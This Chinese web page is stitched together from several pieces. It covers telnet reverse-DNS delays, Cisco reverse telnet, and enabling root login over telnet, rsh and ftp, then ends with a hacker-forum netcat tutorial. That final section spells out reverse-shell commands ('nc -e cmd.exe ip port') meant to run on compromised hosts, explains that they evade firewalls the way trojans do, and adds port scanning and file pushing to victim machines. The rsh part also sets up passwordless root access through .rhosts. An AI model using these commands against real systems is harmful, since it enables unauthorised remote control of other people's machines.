如何关闭telnet等服务的反向地址解析
域名解析是从名称解析到IP地址(DNS),反向域名解析就是从IP地址解析成域名(RDNS); 由于电子邮件的发展,出现很多垃圾邮件或大量发送垃圾邮件进行攻击,对网络、尤其是邮件服务器,严重的造成邮件服务器瘫痪,为了减少或者消除这种攻击,对发送邮件的服务器(尤其是转发服务器)的确认,采用了RDNS技术,如果通过IP解析出的域名不是你邮箱的域名,则会拒绝转发或接收邮件。

如何关闭telnet等服务的反向地址解析
在没有反向地址解析的环境里使用telnet等服务会等待一段时间,本文探讨如何在linux里关闭telnet等服务的反向地址解析 摘自:http://www.douzhe.com/linuxtips/1428.html因为在旧式系统(以inetd为超级服务器)内telnetd和ftpd是通过tcpd服务程序启动的,而tcpd在启动的时候需要进行安全性检查和IP地址反向解释。解决这个问题的方法有两种,一是把IP地址的反向解释加到/etc/hosts文件中或者在DNS内为IP地址做反向解释。第二种方法是不通过tcpd加载telnetd和ftpd,方法为修改/etc/inetd.conf:把ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a改为:ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd -l -a把telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd改为:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd 修改完成以后通过killall -HUP inetd即可生效。

cisco 的哪些设备支持反向TELNET
事实上是都支持的,但是一般的设备上只有console和aux两个异步串口,所以你也只能连两台设备。 2509 有8个异步串口,加上console和aux,适当配置就可以连10个设备。我家里的实验机架就是这样的 2511 有16个异步串口。价格上你可以看看taobao上的报价,如果你认识人,或者从个人手里买,这俩都不贵

telnet命令
Telnet用法 一:简介虽然目前大家都认为telnet/ftp/rsh作为不安全的服务已经不太使用,但在局域网内部的某些情况下仍然广泛地被使用,特别是安全性不是很重要的场合下,某些服务如FTP,由于历史较长,至今大多数场合仍然大有用处。很多人在使用这些服务直接登录作为root时遇到问题,本文就简单地介绍一下设置方法和相关问题。二:环境假设本文的所有操作环境是Redhat Linux,一台为telnet/ftp/rsh/ssh客户,IP为192.168.0.2,主机名为client.domain.com;另一台为服务器,IP为192.168.0.1,主机名为server.domain.com,两者都运行redhat linux 7.1 .三:用法1. 直接telnet作为root.a. 在服务器server.domain.com上运行/usr/sbin/ntsysv后选中telnet服务,击OK。b. 运行#/sbin/service xinetd restart 启动telnet服务c. 运行#e cho "pts/0" >> /etc/securetty 和#e cho "pts/1" >> /etc/securetty......更多的远程终端允许直接登录作为rootd. 确保在server.domain.com上的/etc/hosts中有类似下面的行。192.168.1.2 client.domain.com client如果没有,则在server上运行echo "192.168.1.2 client.domain.com client" >>/etc/hosts至此你应该能从client远程telnet直接作为root了。如果服务器是redhat 6.x,则加单个数字如0,1,2,3...到/etc/securetty后面,一个数字一行,必须以0开始。仅仅加数字而己,没有pts,tty。如果服务器是redhat 5.x,则加ttyp0, ttyp1,ttyp2... 等到/etc/securetty.经常有人问,为什么telnet/ftp进服务器时需要等很久?那是因为当服务器检测出有客户远程连接进来时,它知道客户的IP,但根据telnet/ftp服务的内部机制,它需要反向检查该IP的域名,如果你有DNS服务器且设置了反向域名,则很快查到,若没有,则简单地在服务器的/etc/hosts中加入客户的记录就可以了。2. 直接rsh作为root.a. 在服务器上运行/urs/bin/ntsysv选中rexec ,rlogin ,rsh三项服务。b. 运行#/sbin/service xinetd restart 启动该三项服务。c. 运行#e cho "rexec" >> /etc/securetty;echo "rlogin" >>/etc/securetty;echo "rsh" >> /etc/securettyd. 在服务器上运行#e cho "192.168.0.2 root" >> /root/.rhosts或者 #e cho "client root" >> /root/.rhosts且确保在服务器上的/etc/hosts中有client的记录192.168.0.2 client.domain.com client至此你应该可以从client直接以root身份rsh到服务器不需密码了。注: 仅仅redhat 7.x 开始需要为rsh设置/etc/securetty.3. 直接ftp作为root.这个比较简单,就是在server上的/etc/ftpusers中的root一行前面放个注释#即可。在现代的网络技术下,telnet/rsh/ftp都可以被ssh/scp代替了,甚至已经有了一个winscp,图形化的SCP工具,在http://winscp.vse.cz/eng/, 免费的windows ssh客户有许多,象tera term , putty等等。不过,FTP在某些场合仍然有它的用处。下面例举两种:a. FTP可以直接把远端服务器上某个目录压缩后传送到客户端,如远程服务器有sbin目录,可以用get sbin.tar.gz直接把整个目录压缩后FTP下来成为单个压缩文件。这个方式可以很好地用在远程复制整个linux OS。b. 为了远程复制另一台linux OS,可以用redhat 光盘启动到准备进行分区的界面(选择自动还是手动分区的界面),然后用ALT+F2切换到第二个终端,设置网卡的IP和默认网关,用fdisk/e2fsck 分区用格式化本地硬盘,用FTP远程得到服务器的所有目录除了proc目录,然后即可以复制一台与远端一样的服务器。详细做法请参考《文章荟萃》中另一篇文章http://www.linuxforum.net/doc/cp-wu.html《如何远程复制另一台Linux服务器及相关问题》。4. 直接ssh作为root.OpenSSH的默认设置sshd_config是允许登录作为root的 PermitRootLogin yes ,你可以改为no去禁止这个功能增强安全性。 为了直接不用密码登录作为root,最好是采用RSA键对认证方式进行。

利用nc反向连接时远程主机的telnet服务是不是会自动打开?
不会,那需要本地设置的。 C使用教程使用动画可以提供给核心成员,菜鸟们也可向我索取在黑客界混如果不知道什么叫NC的话,那可真是白混了今天教大家如何来使用NC讲四个命令命令1:监听命令nc -l -p portnc -l -p port > e:log.datnc -l -v -p port参数解释:-l:监听端口,监听入站信息-p:后跟本地端口号-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息提示:一般大家都爱用-vvnc -l -p 80这个很简单,监听80端口如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!nc -l -p 80 > e:log.dat呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件nc -l -v -p 80和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC的屏幕上。呵呵,讲了这么多,来实践下nc -l -v -p 80然后在浏览器中输入本机IP:127.0.0.1呵呵,看到什么?同样,上边两个也是一样,大家自己试验一下吧命令2:程序定向nc -l -p port -t -e cmd.exe本地机: nc -l -p port 或 nc -l -v -p port目标机:nc -e cmd.exe ip port参数解释:-l、-p两个参数已经解释过了-e;作用就是程序定向-t:以telnet的形式来应答例子nc -l -p 5277 -t -e cmd.exe知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!)呵呵,咱们来找台肉鸡试试,我TELNET IP 5277HOHO~~如何?local machine:nc -l -p port ( or nc -l -v -p port )remote machine:nc -e cmd.exe ip port大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)nc -l -p 5277 (坚听本地5277端口)同样也可以用nc -l -v -p 5277运行在本地然后在远程机器上,想办法运行nc -e cmd.exe ip 5277(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!呵呵,看看在本地机器上出现了什么?这样就是反弹~~在本地机器上得到了一个SHELL命令3:扫描端口nc -v ip portnc -v -z ip port-portnc -v -z -u ip port-port参数解释:-z:将输入输出关掉,在扫描时使用nc -v ip port这个命令是针对某一个端口进行扫描例如:nc -v ip 135扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息例如:80端口我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息nc -v -z ip port-port这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围例如:nc -v -z ip 1-200可以看到我机器上的1-200的TCP端口的开放情况nc -v -z -u ip port-port这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的例如:nc -v -z -u ip 1-200这个命令就会扫1-200的UDP端口命令4:传送文件(HOHO,I LIKE)LOCAL MACHINE:nc -v -n ip port < x:svr.exeREMOTE MACHINE:nc -v -l -p port > y:svr.exe参数解释:-n:指定数字的IP地址这两个命令结合起来是用来传送文件的首先,在远程机上运行命令:nc -v -l -p 5277 > c:pulist.exe这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口并把接受到的信息数据写到c:pulist.exe中这时候在本地机上运行nc -v -n ip 5277 < e:hackpulist.exe这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上这样远程主机就会自动创建一个pulist.exe文件。。呵呵,你想到了吗??上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来, 因为NC的用法不仅仅局限于这几种而已哦!!对NC来说,只有想不到,没有做不到的!!!

本文由 在线网速测试 整理编辑,转载请注明出处,原文链接:https://www.wangsu123.cn/news/314924.html。